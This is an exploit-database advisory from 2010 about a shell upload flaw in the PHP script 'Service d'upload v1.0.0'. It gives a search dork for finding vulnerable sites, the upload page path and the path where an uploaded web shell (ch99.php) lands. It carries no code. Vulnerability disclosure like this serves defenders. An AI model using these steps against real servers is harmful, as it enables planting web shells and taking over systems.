id: 10601
date: 01/03/2010
title: Service d'upload v1.0.0 Shell Upload Vulnerability
author: indoushka
cves: 

==================================================
Service d'upload v1.0.0 Shell Upload Vulnerability
==================================================

========================================================================================                 
| # Title    : Service d'upload Version 1.0.0 Shell Upload Vulnerability                   
| # Author   : indoushka    
| # Total alerts found : 1                                               
|                High  : 1                                       
| # Dork     : Uploader des fichiers                                   
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Shell Upload                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- Shell Upload
 
http://server/upload/
 
http://server/upload/up/ch99.php



#  0day.today [2023-03-21]  #